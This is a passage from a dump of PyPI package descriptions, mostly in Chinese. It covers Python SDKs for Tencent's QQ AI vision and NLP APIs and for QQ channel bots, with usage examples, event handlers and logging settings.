\u66b4\u6050\u8bc6\u522b (`qqai.vision.picture.Terrorism`)- [x] \u4f18\u56feOCR- [x] \u8eab\u4efd\u8bc1OCR (`qqai.vision.ocr.IDCardOCR`)- [x] \u540d\u7247OCR (`qqai.vision.ocr.BCOCR`)- [x] \u884c\u9a76\u8bc1\u9a7e\u9a76\u8bc1OCR (`qqai.vision.ocr.DriverLicenseOCR`)- [x] \u8f66\u724cOCR (`qqai.vision.ocr.PlateOCR`)- [x] \u8425\u4e1a\u6267\u7167OCR (`qqai.vision.ocr.BizLicenseOCR`)- [x] \u94f6\u884c\u5361OCR (`qqai.vision.ocr.CreditCardOCR`)- [x] \u901a\u7528OCR (`qqai.vision.ocr.GeneralOCR`)- [x] \u624b\u5199\u4f53OCR (`qqai.vision.ocr.HandwritingOCR`)- [x] \u4eba\u8138\u8bc6\u522b- [x] \u4eba\u8138\u68c0\u6d4b\u4e0e\u5206\u6790 (`qqai.vision.face.DetectFace`)- [x] \u591a\u4eba\u8138\u68c0\u6d4b (`qqai.vision.face.DetectMultiFace`)- [x] \u4eba\u8138\u5bf9\u6bd4 (`qqai.vision.face.FaceCompare`)- [x] \u8de8\u5e74\u9f84\u4eba\u8138\u8bc6\u522b (`qqai.vision.face.DetectCrossAgeFace`)- [x] \u4e94\u5b98\u5b9a\u4f4d (`qqai.vision.face.FaceShape`)- [x] \u4eba\u8138\u8bc6\u522b (`qqai.vision.face.FaceIdentify`)- [x] \u4eba\u8138\u9a8c\u8bc1 (`qqai.vision.face.FaceVerify`)- [x] \u4e2a\u4f53\u7ba1\u7406- [x] \u4e2a\u4f53\u521b\u5efa (`qqai.vision.face.NewPerson`)- [x] \u5220\u9664\u4e2a\u4f53 (`qqai.vision.face.DelPerson`)- [x] \u589e\u52a0\u4eba\u8138 (`qqai.vision.face.AddFace`)- [x] \u5220\u9664\u4eba\u8138 (`qqai.vision.face.DelFace`)- [x] \u8bbe\u7f6e\u4fe1\u606f (`qqai.vision.face.SetInfo`)- [x] \u83b7\u53d6\u4fe1\u606f (`qqai.vision.face.GetInfo`)- [x] \u4fe1\u606f\u67e5\u8be2- [x] \u83b7\u53d6\u7ec4\u5217\u8868 (`qqai.vision.face.GetGroupIds`)- [x] \u83b7\u53d6\u4e2a\u4f53\u5217\u8868 (`qqai.vision.face.GetPersonIds`)- [x] \u83b7\u53d6\u4eba\u8138\u5217\u8868 (`qqai.vision.face.GetFaceIds`)- [x] \u83b7\u53d6\u4eba\u8138\u4fe1\u606f (`qqai.vision.face.GetFaceInfo`)- [x] \u56fe\u7247\u8bc6\u522b- [x] \u7269\u4f53\u573a\u666f\u8bc6\u522b- [x] \u573a\u666f\u8bc6\u522b (`qqai.vision.picture.SceneR`)- [x] \u7269\u4f53\u8bc6\u522b (`qqai.vision.picture.ObjectR`)- [x] \u56fe\u7247\u6807\u7b7e\u8bc6\u522b (`qqai.vision.picture.Tag`)- [x] \u770b\u56fe\u8bf4\u8bdd (`qqai.vision.picture.ImgToText`)- [x] \u6a21\u7cca\u56fe\u7247\u68c0\u6d4b (`qqai.vision.picture.Fuzzy`)- [x] \u7f8e\u98df\u56fe\u7247\u8bc6\u522b (`qqai.vision.picture.Food`)- [x] \u56fe\u7247\u7279\u6548- [x] \u4eba\u8138\u7f8e\u5986 (`qqai.vision.ptu.FaceCosmetic`)- [x] \u4eba\u8138\u53d8\u5986 (`qqai.vision.ptu.FaceDecoration`)- [x] \u6ee4\u955c- [x] \u6ee4\u955c\uff08\u5929\u5929P\u56fe\uff09 (`qqai.vision.ptu.ImgFilterPitu`)- [x] \u6ee4\u955c\uff08AI Lab\uff09 (`qqai.vision.ptu.ImgFilterAILab`)- [x] \u4eba\u8138\u878d\u5408 (`qqai.vision.ptu.FaceMerge`)- [x] \u5927\u5934\u8d34 (`qqai.vision.ptu.FaceSticker`)- [x] \u989c\u9f84\u68c0\u6d4b (`qqai.vision.ptu.FaceAge`)## \u8c03\u7528\u65b9\u5f0f\u53ef\u4ee5\u76f4\u63a5\u5bfc\u5165\u5305\uff0c\u518d\u4f7f\u7528\u5176\u4e2d\u7684\u7c7b\uff1b\u4e5f\u53ef\u4ee5\u5bfc\u5165\u5b50\u5305\u6216\u7c7b\u3002\u8c03\u7528\u7c7b\u7684\u65f6\u5019\u5b9a\u4e49\u597dAppID\u548cAppKey\u3002\u5404\u4e2a\u7c7b\u90fd\u6709\u4e00\u4e2a`run()`\u65b9\u6cd5\u4ee5\u6267\u884c\u64cd\u4f5c\u3002\u8be5\u65b9\u6cd5\u53c2\u6570\u6709\u6240\u4e0d\u540c\uff0c\u8bf7\u67e5\u9605\u5f00\u53d1\u5e73\u53f0\u6587\u6863\u548c\u4ee3\u7801\u4ee5\u8f93\u5165\u3002\u4ee5\u4e0b\u4e3a\u793a\u4f8b\uff1a```pythonimport qqaiqqai.vision.picture.ImgToText('your_app_id', 'your_app_key').run('https://yyb.gtimg.com/aiplat/ai/assets/ai-demo/express-6.jpg')# {'ret': 0, 'msg': 'ok', 'data': {'text': '\u4e00\u4f4d\u7537\u58eb\u5728\u6d77\u8fb9\u9a91\u81ea\u884c\u8f66\u7684\u7167\u7247'}}from qqai.vision.picture import ImgToTextit = ImgToText('your_app_id', 'your_app_key')it.run('https://yyb.gtimg.com/aiplat/ai/assets/ai-demo/express-6.jpg')# {'ret': 0, 'msg': 'ok', 'data': {'text': '\u4e00\u4f4d\u7537\u58eb\u5728\u6d77\u8fb9\u9a91\u81ea\u884c\u8f66\u7684\u7167\u7247'}}```## \u7528\u6cd5\uff08\u539f\u6587\u6863\uff09\u5f53\u524d\u5305\u542b\u4ee5\u4e0b\u63a5\u53e3\uff1a- [\u804a\u5929\u673a\u5668\u4eba](#\u804a\u5929\u673a\u5668\u4eba)- [\u6587\u672c\u7ffb\u8bd1](#\u6587\u672c\u7ffb\u8bd1)- [\u56fe\u7247\u8f6c\u6587\u5b57](#\u56fe\u7247\u8f6c\u6587\u5b57)- [\u4eba\u8138\u68c0\u6d4b](#\u4eba\u8138\u68c0\u6d4b)### \u804a\u5929\u673a\u5668\u4eba```pyfrom qqai import TextChatsiri = TextChat(your_app_id, your_app_key)# \u5355\u53e5\u5bf9\u8bddanswer = siri.ask('\u4f60\u662f\u8c01')print(answer)# >>> \u6211\u662f\u4f60\u7684\u5c0f\u52a9\u624b\u554a# \u8fde\u7eed\u804a\u5929siri.chat()# < \u6709\u5565\u60f3\u8ddf\u6211\u8bf4\u7684\uff1f# > \u4f60\u662f\u8c01\u554a\uff1f# < \u6211\u662f\u4f60\u7684\u5c0f\u52a9\u624b\u554a# > \u4f60\u80fd\u5e72\u561b\u5440# < \u5475\u5475\uff0c\u6211\u80fd\u5e72\u7684\u4e8b\u60c5\u591a\u7684\u6570\u4e0d\u6e05\u3002```### \u6587\u672c\u7ffb\u8bd1\u53ef\u7528\u8bed\u8a00\u89c1[\u5b98\u65b9\u6587\u6863](https://ai.qq.com/doc/nlptrans.shtml#5-%E6%94%AF%E6%8C%81%E8%AF%AD%E8%A8%80%E5%AE%9A%E4%B9%89)```pyfrom qqai import NLPTransrobot = NLPTrans(you_app_id, you_app_key)result = robot.run('\u613f\u539f\u529b\u4e0e\u4f60\u540c\u5728')print(result)# {'ret': 0, 'msg': 'ok', 'data': {'source_text': '\u613f\u539f\u529b\u4e0e\u4f60\u540c\u5728', 'target_text': 'May the Force be with you'}}# \u9ed8\u8ba4\u4e3a\u4e2d\u82f1\u7ffb\u8bd1\uff0c\u82e5\u9700\u8981\u5176\u4ed6\u8bed\u79cd\u7ffb\u8bd1\uff0c\u8bf7\u6309\u4ee5\u4e0b\u683c\u5f0f\u5b9e\u4f8b\u5316\uff1a# source\u4e3a\u6e90\u8bed\u8a00\uff0ctarget\u4e3a\u76ee\u6807\u8bed\u8a00\uff0crobot = NLPTrans(you_app_id, you_app_key, source='en', target='es')result = robot.run('May the force be with you.')print(result)# {'ret': 0, 'msg': 'ok', 'data': {'source_text': 'May the force be with you.', 'target_text': 'Que la fuerza est\u00e9 contigo.'}}```### \u56fe\u7247\u8f6c\u6587\u5b57```pyfrom qqai import ImgToTextrobot = ImgToText(your_app_id, your_app_key)# \u8bc6\u522b\u56fe\u7247URLresult = robot.run('https://yyb.gtimg.com/aiplat/ai/assets/ai-demo/express-6.jpg')print(result)# {'ret': 0, 'msg': 'ok', 'data': {'text': '\u4e00\u4f4d\u7537\u58eb\u5728\u6d77\u8fb9\u9a91\u81ea\u884c\u8f66\u7684\u7167\u7247'}}# \u8bc6\u522b\u6253\u5f00\u7684\u672c\u5730\u56fe\u7247with open('/my/img.jpeg', 'rb') as image_file:result = robot.run(image_file)print(result)# {'ret': 0, 'msg': 'ok', 'data': {'text': '\u4e00\u8258\u98de\u8239'}}```### \u4eba\u8138\u68c0\u6d4b```pyfrom qqai import Detectfacerobot = Detectface(your_app_id, your_app_key)# \u8c03\u7528\u65b9\u6cd5\u4e0e\u56fe\u7247\u8f6c\u6587\u5b57\u76f8\u540c```"} +{"package": "qqbot", "pacakge-description": "No description available on PyPI."} +{"package": "qq-bot", "pacakge-description": "qq-bot-pythonsdk\u5b89\u88c5\u5916\u53d1\u7248\u672c\u901a\u8fc7\u4e0b\u9762\u65b9\u5f0f\u5b89\u88c5pipinstallqq-bot# \u6ce8\u610f\u662f qq-bot \u800c\u4e0d\u662f qqbot\uff01\u66f4\u65b0\u5305\u7684\u8bdd\u9700\u8981\u6dfb\u52a0--upgrade\u6ce8\uff1a\u9700\u8981python3.7+sdk\u4f7f\u7528\u9700\u8981\u4f7f\u7528\u7684\u5730\u65b9import SDKimportqqbot\u793a\u4f8b\u673a\u5668\u4eba``examples`<./examples/>`_ \u76ee\u5f55\u4e0b\u5b58\u653e\u793a\u4f8b\u673a\u5668\u4eba\uff0c\u53ef\u4f9b\u5b9e\u73b0\u53c2\u8003\u3002qqbot-API\u57fa\u4e8ehttps://bot.q.qq.com/wiki/develop/api/\u673a\u5668\u4eba\u5f00\u653e\u5e73\u53f0API\u5b9e\u73b0\u7684API\u63a5\u53e3\u5c01\u88c5\u3002\u4f7f\u7528\u65b9\u6cd5\u901a\u8fc7import\u5bf9\u5e94API\u7684\u7c7b\u6765\u8fdb\u884c\u4f7f\u7528\uff0c\u6784\u9020\u53c2\u6570\uff08Token\u5bf9\u8c61\uff0c\u662f\u5426\u6c99\u76d2\u6a21\u5f0f\uff09\u3002\u6bd4\u5982\u4e0b\u9762\u7684\u4f8b\u5b50\uff0c\u901a\u8fc7api\u5f53\u524d\u673a\u5668\u4eba\u7684\u76f8\u5173\u4fe1\u606f\uff1aimportqqbottoken=qqbot.Token(\"{appid}\",\"{token}\")api=qqbot.UserAPI(token,False)user=api.me()print(user.username)# \u6253\u5370\u673a\u5668\u4eba\u540d\u5b57async \u793a\u4f8b\uff1aimportqqbottoken=qqbot.Token(\"{appid}\",\"{token}\")api=qqbot.AsyncUserAPI(token,False)# \u83b7\u53d6looploop=asyncio.get_event_loop()user=loop.run_until_complete(api.me())print(user.username)# \u6253\u5370\u673a\u5668\u4eba\u540d\u5b57qqbot-\u4e8b\u4ef6\u76d1\u542c\u5f02\u6b65\u6a21\u5757\u57fa\u4e8e websocket \u6280\u672f\u7528\u4e8e\u76d1\u542c\u9891\u9053\u5185\u7684\u76f8\u5173\u4e8b\u4ef6\uff0c\u5982\u6d88\u606f\u3001\u6210\u5458\u53d8\u5316\u7b49\u4e8b\u4ef6\uff0c\u7528\u4e8e\u5f00\u53d1\u8005\u5bf9\u4e8b\u4ef6\u8fdb\u884c\u76f8\u5e94\u7684\u5904\u7406\u3002\u4f7f\u7528\u65b9\u6cd5\u901a\u8fc7\u6ce8\u518c\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\u5e76\u8bbe\u7f6e\u56de\u8c03\u51fd\u6570\u540e\uff0c\u5373\u53ef\u5b8c\u6210\u5bf9\u4e8b\u4ef6\u7684\u76d1\u542c\u3002\u6bd4\u5982\u4e0b\u9762\u8fd9\u4e2a\u4f8b\u5b50\uff1a\u9700\u8981\u76d1\u542c\u673a\u5668\u4eba\u88ab@\u540e\u6d88\u606f\u5e76\u8fdb\u884c\u76f8\u5e94\u7684\u56de\u590d\u3002\u5148\u521d\u59cb\u5316\u9700\u8981\u7528\u7684token\u5bf9\u8c61\uff08appid\u548ctoken\u53c2\u6570\u4ece\u673a\u5668\u4eba\u7ba1\u7406\u7aef\u83b7\u53d6 \uff09\u901a\u8fc7qqbot.listen_events\u6ce8\u518c\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\u901a\u8fc7qqbot.HandlerType\u5b9a\u4e49\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\uff08\u90e8\u5206\u4e8b\u4ef6\u53ef\u80fd\u9700\u8981\u6743\u9650\u7533\u8bf7\uff09token=qqbot.Token(\"{appid}\",\"{token}\")# \u6ce8\u518c\u4e8b\u4ef6\u7c7b\u578b\u548c\u56de\u8c03\uff0c\u53ef\u4ee5\u6ce8\u518c\u591a\u4e2aqqbot_handler=qqbot.Handler(qqbot.HandlerType.AT_MESSAGE_EVENT_HANDLER,_message_handler)qqbot.listen_events(token,False,qqbot_handler)\u6700\u540e\u5b9a\u4e49\u6ce8\u518c\u4e8b\u4ef6\u56de\u8c03\u6267\u884c\u51fd\u6570,\u5982_message_handler\u3002def_message_handler(event,message:Message):msg_api=qqbot.MessageAPI(token,False)# \u6253\u5370\u8fd4\u56de\u4fe1\u606fqqbot.logger.info(\"event%s\"%event+\",receive message%s\"%message.content)# \u6784\u9020\u6d88\u606f\u53d1\u9001\u8bf7\u6c42\u6570\u636e\u5bf9\u8c61send=qqbot.MessageSendRequest(\"<@%s>\u8c22\u8c22\u4f60\uff0c\u52a0\u6cb9\"%message.author.id,message.id)# \u901a\u8fc7api\u53d1\u9001\u56de\u590d\u6d88\u606fmsg_api.post_message(message.channel_id,send)async \u793a\u4f8b:# async\u7684\u5f02\u6b65\u63a5\u53e3\u7684\u4f7f\u7528\u793a\u4f8btoken=qqbot.Token(\"{appid}\",\"{token}\")qqbot_handler=qqbot.Handler(qqbot.HandlerType.AT_MESSAGE_EVENT_HANDLER,_message_handler)qqbot.async_listen_events(token,False,qqbot_handler)asyncdef_message_handler(event,message:qqbot.Message):\"\"\"\n \u5b9a\u4e49\u4e8b\u4ef6\u56de\u8c03\u7684\u5904\u7406\n\n :param event: \u4e8b\u4ef6\u7c7b\u578b\n :param message: \u4e8b\u4ef6\u5bf9\u8c61\uff08\u5982\u76d1\u542c\u6d88\u606f\u662fMessage\u5bf9\u8c61\uff09\n \"\"\"msg_api=qqbot.AsyncMessageAPI(token,False)# \u6253\u5370\u8fd4\u56de\u4fe1\u606fqqbot.logger.info(\"event%s\"%event+\",receive message%s\"%message.content)foriinrange(5):awaitasyncio.sleep(5)# \u6784\u9020\u6d88\u606f\u53d1\u9001\u8bf7\u6c42\u6570\u636e\u5bf9\u8c61send=qqbot.MessageSendRequest(\"<@%s>\u8c22\u8c22\u4f60\uff0c\u52a0\u6cb9 \"%message.author.id,message.id)# \u901a\u8fc7api\u53d1\u9001\u56de\u590d\u6d88\u606fawaitmsg_api.post_message(message.channel_id,send)\u6ce8\uff1a\u5f53\u524d\u652f\u6301\u4e8b\u4ef6\u53ca\u56de\u8c03\u6570\u636e\u5bf9\u8c61\u4e3a\uff1aclassHandlerType(Enum):PLAIN_EVENT_HANDLER=0# \u900f\u4f20\u4e8b\u4ef6GUILD_EVENT_HANDLER=1# \u9891\u9053\u4e8b\u4ef6GUILD_MEMBER_EVENT_HANDLER=2# \u9891\u9053\u6210\u5458\u4e8b\u4ef6CHANNEL_EVENT_HANDLER=3# \u5b50\u9891\u9053\u4e8b\u4ef6MESSAGE_EVENT_HANDLER=4# \u6d88\u606f\u4e8b\u4ef6AT_MESSAGE_EVENT_HANDLER=5# At\u6d88\u606f\u4e8b\u4ef6# DIRECT_MESSAGE_EVENT_HANDLER = 6 # \u79c1\u4fe1\u6d88\u606f\u4e8b\u4ef6# AUDIO_EVENT_HANDLER = 7 # \u97f3\u9891\u4e8b\u4ef6\u4e8b\u4ef6\u56de\u8c03\u51fd\u6570\u7684\u53c2\u6570 1 \u4e3a\u4e8b\u4ef6\u540d\u79f0\uff0c\u53c2\u6570 2 \u8fd4\u56de\u5177\u4f53\u7684\u6570\u636e\u5bf9\u8c61\u3002# \u900f\u4f20\u4e8b\u4ef6\uff08\u65e0\u5177\u4f53\u7684\u6570\u636e\u5bf9\u8c61\uff0c\u6839\u636e\u540e\u53f0\u8fd4\u56deJson\u5bf9\u8c61\uff09def_plain_handler(event,data):# \u9891\u9053\u4e8b\u4ef6def_guild_handler(event,guild:Guild):# \u9891\u9053\u6210\u5458\u4e8b\u4ef6def_guild_member_handler(event,guild_member:GuildMember):# \u5b50\u9891\u9053\u4e8b\u4ef6def_channel_handler(event,channel:Channel):# \u6d88\u606f\u4e8b\u4ef6# At\u6d88\u606f\u4e8b\u4ef6def_message_handler(event,message:Message):\u65e5\u5fd7\u6253\u5370\u57fa\u4e8e\u81ea\u5e26\u7684 logging \u6a21\u5757\u5c01\u88c5\u7684\u65e5\u5fd7\u6a21\u5757\uff0c\u63d0\u4f9b\u4e86\u65e5\u5fd7\u5199\u5165\u4ee5\u53ca\u7f8e\u5316\u4e86\u6253\u5370\u683c\u5f0f\uff0c\u5e76\u652f\u6301\u901a\u8fc7\u8bbe\u7f6eQQBOT_LOG_LEVEL\u73af\u5883\u53d8\u91cf\u6765\u8c03\u6574\u65e5\u5fd7\u6253\u5370\u7ea7\u522b\uff08\u9ed8\u8ba4\u6253\u5370\u7ea7\u522b\u4e3aINFO\uff09\u3002\u4f7f\u7528\u65b9\u6cd5\u5f15\u7528\u6a21\u5757\uff0c\u5e76\u83b7\u53d6logger\u5b9e\u4f8b\uff1afromcore.utilimportlogginglogger=logging.getLogger()\u6216\u8005\u901a\u8fc7qqbot.logger\u4e5f\u53ef\u4ee5\u83b7\u53d6logger\u5bf9\u8c61\u7136\u540e\u5c31\u53ef\u4ee5\u6109\u5feb\u5730\u4f7f\u7528 logger \u8fdb\u884c\u6253\u5370\u3002\u4f8b\u5982\uff1alogger.info(\"hello world!\")\u8bbe\u7f6e\u65e5\u5fd7\u7ea7\u522bSDK\u9ed8\u8ba4\u7684\u65e5\u5fd7\u7ea7\u522b\u4e3aINFO\u7ea7\u522b\uff0c\u9700\u8981\u4fee\u6539\u8bf7\u67e5\u770b\u4e0b\u9762\u4fe1\u606fDebug\u65e5\u5fd7\u547d\u4ee4\u884c\u542f\u52a8py\u540e\u901a\u8fc7\u589e\u52a0\u53c2\u6570-d\u6216--debug\u53ef\u4ee5\u6253\u5f00debug\u65e5\u5fd7python3demo_at_reply.py-d\u5176\u4ed6\u7ea7\u522b\u65e5\u5fd7\u901a\u8fc7export\u547d\u4ee4\u6dfb\u52a0QQBOT_LOG_LEVEL\u73af\u5883\u53d8\u91cf\u53ef\u4ee5\u8bbe\u7f6e\u65e5\u5fd7\u7ea7\u522b\u3002\u4f8b\u5982\uff1aexportQQBOT_LOG_LEVEL=10# 10\u8868\u793aDEBUG\u7ea7\u522b\u51e0\u4e2a\u53ef\u9009\u53d6\u503c\uff08\u53c2\u8003\u4e86logging\u6a21\u5757\u7684\u53d6\u503c\uff09\uff1aLevel\u53d6\u503cCRITICAL50ERROR40WARNING30INFO20DEBUG10NOTSET0\u7981\u7528\u65e5\u5fd7\u6587\u4ef6\u8f93\u51fa\u9ed8\u8ba4\u60c5\u51b5\u4e0b qqbot \u4f1a\u5728\u5f53\u524d\u6267\u884c\u76ee\u5f55\u4e0b\u751f\u6210\u683c\u5f0f\u4e3aqqbot.log.*\u7684\u65e5\u5fd7\u6587\u4ef6\u3002\u5982\u679c\u60f3\u7981\u7528\u8fd9\u4e9b\u65e5\u5fd7\u6587\u4ef6\uff0c\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6eQQBOT_DISABLE_LOG\u73af\u5883\u53d8\u91cf\u4e3a 1 \u6765\u5173\u95ed\u3002exportQQBOT_DISABLE_LOG=1# 1\u8868\u793a\u7981\u7528\u65e5\u5fd7\u4fee\u6539\u65e5\u5fd7\u8f93\u51fa\u8def\u5f84SDK\u4e5f\u652f\u6301\u4fee\u6539\u65e5\u5fd7\u8f93\u51fa\u8def\u5f84\uff0c\u7531\u4e8e\u5b9e\u9645\u8def\u5f84\u4e0d\u5c3d\u76f8\u540c\uff0c\u6240\u4ee5\u6b64\u5904\u4f7f\u7528os\u6a21\u5757\u6765\u8bbe\u7f6e\u4e34\u65f6\u73af\u5883\u53d8\u91cf\u3002importosos.environ[\"QQBOT_LOG_PATH\"]=os.path.join(os.getcwd(),\"log\",\"%(name)s.log\")# \u65e5\u5fd7\u5c06\u751f\u6210\u5728\u6267\u884c\u76ee\u5f55\u4e0blog\u6587\u4ef6\u5939\u5185\u4fee\u6539\u65e5\u5fd7\u683c\u5f0f\u901a\u8fc7export\u547d\u4ee4\u6dfb\u52a0QQBOT_LOG_FILE_FORMAT\u548cQQBOT_LOG_PRINT_FORMAT\u73af\u5883\u53d8\u91cf\u53ef\u4ee5\u8bbe\u7f6e\u65e5\u5fd7\u683c\u5f0f\u3002\u4f8b\u5982\uff1a# \u8bbe\u7f6e\u6587\u4ef6\u8f93\u51fa\u683c\u5f0fexportQQBOT_LOG_FILE_FORMAT=\"%(asctime)s [%(levelname)s] %(funcName)s (%(filename)s:%(lineno)s): %(message)s\"\u5982\u9700\u4f7f\u7528\u8f6c\u4e49\u5b57\u7b26\uff0c\u53ef\u4ee5\u4f7f\u7528os\u6a21\u5757\u6dfb\u52a0\u3002\u4f8b\u5982\uff1a# \u8bbe\u7f6e\u63a7\u5236\u53f0\u8f93\u51fa\u683c\u5f0fimportosos.environ[\"QQBOT_LOG_PRINT_FORMAT\"]=\"%(asctime)s\\033[1;33m[%(levelname)s]%(funcName)s(%(filename)s:%(lineno)s):\\033[0m%(message)s\"sdk\u5f00\u53d1\u73af\u5883\u914d\u7f6epipinstall-rrequirements.txt# \u5b89\u88c5\u4f9d\u8d56\u7684pip\u5305pre-commitinstall# \u5b89\u88c5\u683c\u5f0f\u5316\u4ee3\u7801\u7684\u94a9\u5b50\u5355\u5143\u6d4b\u8bd5\u4ee3\u7801\u5e93\u63d0\u4f9bAPI\u63a5\u53e3\u6d4b\u8bd5\u548c websocket \u7684\u5355\u6d4b\u7528\u4f8b\uff0c\u4f4d\u4e8etests\u76ee\u5f55\u4e2d\u3002\u5982\u679c\u9700\u8981\u81ea\u5df1\u8fd0\u884c\uff0c\u53ef\u4ee5\u5728tests\u76ee\u5f55\u91cd\u547d\u540d.test.yaml\u6587\u4ef6\u540e\u6dfb\u52a0\u81ea\u5df1\u7684\u6d4b\u8bd5\u53c2\u6570\u542f\u52a8\u6d4b\u8bd5\uff1a# test yaml \u7528\u4e8e\u8bbe\u7f6etest\u76f8\u5173\u7684\u53c2\u6570\uff0c\u5f00\u6e90\u7248\u672c\u9700\u8981\u53bb\u6389\u53c2\u6570token:appid:\"xxx\"token:\"xxxxx\"test_params:guild_id:\"xx\"guild_owner_id:\"xx\"guild_owner_name:\"xx\"guild_test_member_id:\"xx\"guild_test_role_id:\"xx\"channel_id:\"xx\"channel_name:\"xx\"robot_name:\"xxx\"is_sandbox:False\u5355\u6d4b\u6267\u884c\u65b9\u6cd5\uff1a\u5148\u786e\u4fdd\u5df2\u5b89\u88c5pytest\uff1apipinstallpytest\u7136\u540e\u5728\u9879\u76ee\u6839\u76ee\u5f55\u4e0b\u6267\u884c\u5355\u6d4b\uff1apytest\u52a0\u5165\u5b98\u65b9\u793e\u533a\u6b22\u8fce\u626b\u7801\u52a0\u5165QQ \u9891\u9053\u5f00\u53d1\u8005\u793e\u533a\u3002"} +{"package": "qqbot-linger", "pacakge-description": "\u73b2\u513f\u81ea\u7528 QQ \u673a\u5668\u4eba\u3002\u529f\u80fdBilibili \u7528\u6237\u76d1\u63a7\uff0c\u53c2\u89c1\uff1anonebot-plugin-bam\u8dd1\u56e2\u9ab0\u5b50\uff0c\u53c2\u89c1nonebot-plugin-7s-roll\u4f7f\u7528pipinstallqqbot-lingercd/a/path/you/want/store/config/and/database\nvim.env# edit this file, see `.env.sample file` for a example# Start a IM Bot Client compatible with OneBot v11 protocol# Like go-cqhttp, cqhttp-mirai etclinger# start the bot\u6ce8\u610f\uff1a\u4f60\u9700\u8981\u4e00\u4e2a\u652f\u6301\u8fde\u63a5 OneBot V11 \u534f\u8bae\u7684 IM \u5ba2\u6237\u7aef\u7684\u5177\u4f53\u5b9e\u73b0\uff0c\u5e76\u5c06\u5176\u914d\u7f6e\u4e3a\u8fde\u63a5\u5230\u6b64\u673a\u5668\u4eba\u7684 WS \u7aef\u53e3\uff0c\u624d\u80fd\u5b9e\u9645\u4f7f\u7528\u5176\u529f\u80fd\u3002\u622a\u56fe\u4ee5\u540e\u518d\u5f04\u3002LICENSEUnlicense."} +{"package": "qq-botpy", "pacakge-description": "botpy\u662f\u57fa\u4e8e\u673a\u5668\u4eba\u5f00\u653e\u5e73\u53f0API\u5b9e\u73b0\u7684\u673a\u5668\u4eba\u6846\u67b6\uff0c\u76ee\u7684\u63d0\u4f9b\u4e00\u4e2a\u6613\u4f7f\u7528\u3001\u5f00\u53d1\u6548\u7387\u9ad8\u7684\u5f00\u53d1\u6846\u67b6\u3002\u51c6\u5907\u5de5\u4f5c\u5b89\u88c5pipinstallqq-botpy\u66f4\u65b0\u5305\u7684\u8bdd\u9700\u8981\u6dfb\u52a0--upgrade\u6ce8\uff1a\u9700\u8981python3.7+\u4f7f\u7528\u9700\u8981\u4f7f\u7528\u7684\u5730\u65b9import botpyimportbotpy\u517c\u5bb9\u63d0\u793a\u539f\u673a\u5668\u4eba\u7684\u8001\u7248\u672cqq-bot\u4ecd\u7136\u53ef\u4ee5\u4f7f\u7528\uff0c\u4f46\u65b0\u63a5\u53e3\u7684\u652f\u6301\u4e0a\u4f1a\u9010\u6e10\u6682\u505c\uff0c\u6b64\u6b21\u5347\u7ea7\u4e0d\u4f1a\u5f71\u54cd\u7ebf\u4e0a\u4f7f\u7528\u7684\u673a\u5668\u4eba\u4f7f\u7528\u65b9\u5f0f\u5feb\u901f\u5165\u95e8\u6b65\u9aa41\u901a\u8fc7\u7ee7\u627f\u5b9e\u73b0bot.Client, \u5b9e\u73b0\u81ea\u5df1\u7684\u673a\u5668\u4ebaClient\u6b65\u9aa42\u5b9e\u73b0\u673a\u5668\u4eba\u76f8\u5173\u4e8b\u4ef6\u7684\u5904\u7406\u65b9\u6cd5,\u5982on_at_message_create\uff0c \u8be6\u7ec6\u7684\u4e8b\u4ef6\u76d1\u542c\u5217\u8868\uff0c\u8bf7\u53c2\u8003\u4e8b\u4ef6\u76d1\u542c.md\u5982\u4e0b\uff0c\u662f\u5b9a\u4e49\u673a\u5668\u4eba\u88ab@\u7684\u540e\u81ea\u52a8\u56de\u590d:importbotpyfrombotpy.types.messageimportMessageclassMyClient(botpy.Client):asyncdefon_ready(self):print(f\"robot \u300c{self.robot.name}\u300d on_ready!\")asyncdefon_at_message_create(self,message:Message):awaitmessage.reply(content=f\"\u673a\u5668\u4eba{self.robot.name}\u6536\u5230\u4f60\u7684@\u6d88\u606f\u4e86:{message.content}\")\u6ce8\u610f:\u6bcf\u4e2a\u4e8b\u4ef6\u4f1a\u4e0b\u53d1\u5177\u4f53\u7684\u6570\u636e\u5bf9\u8c61\uff0c\u5982`message`\u76f8\u5173\u4e8b\u4ef6\u662f`message.Message`\u7684\u5bf9\u8c61 (\u90e8\u5206\u4e8b\u4ef6\u900f\u4f20\u4e86\u540e\u53f0\u6570\u636e\uff0c\u6682\u672a\u5b9e\u73b0\u5bf9\u8c61\u7f13\u5b58)\u6b65\u9aa43\u8bbe\u7f6e\u673a\u5668\u4eba\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\u901a\u9053\uff0c\u5e76\u542f\u52a8clientimportbotpyfrombotpy.types.messageimportMessageclassMyClient(botpy.Client):asyncdefon_at_message_create(self,message:Message):awaitself.api.post_message(channel_id=message.channel_id,content=\"content\")intents=botpy.Intents(public_guild_messages=True)client=MyClient(intents=intents)client.run(appid=\"12345\",token=\"xxxx\")\u5907\u6ce8\u4e5f\u53ef\u4ee5\u901a\u8fc7\u9884\u8bbe\u7f6e\u7684\u7c7b\u578b\uff0c\u8bbe\u7f6e\u9700\u8981\u76d1\u542c\u7684\u4e8b\u4ef6\u901a\u9053importbotpyintents=botpy.Intents.none()intents.public_guild_messages=True\u4f7f\u7528API\u5982\u679c\u8981\u4f7f\u7528api\u65b9\u6cd5\uff0c\u53ef\u4ee5\u53c2\u8003\u5982\u4e0b\u65b9\u5f0f:importbotpyfrombotpy.types.messageimportMessageclassMyClient(botpy.Client):asyncdefon_at_message_create(self,message:Message):awaitself.api.post_message(channel_id=message.channel_id,content=\"content\")\u793a\u4f8b\u673a\u5668\u4eba``examples`<./examples/>`_ \u76ee\u5f55\u4e0b\u5b58\u653e\u793a\u4f8b\u673a\u5668\u4eba\uff0c\u5177\u4f53\u4f7f\u7528\u53ef\u53c2\u8003``Readme.md`<./examples/README.md>`_examples/\n.\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 config.example.yaml # \u793a\u4f8b\u914d\u7f6e\u6587\u4ef6\uff08\u9700\u8981\u4fee\u6539\u4e3aconfig.yaml\uff09\n\u251c\u2500\u2500 demo_announce.py # \u673a\u5668\u4eba\u516c\u544aAPI\u4f7f\u7528\u793a\u4f8b\n\u251c\u2500\u2500 demo_api_permission.py # \u673a\u5668\u4eba\u6388\u6743\u67e5\u8be2API\u4f7f\u7528\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply.py # 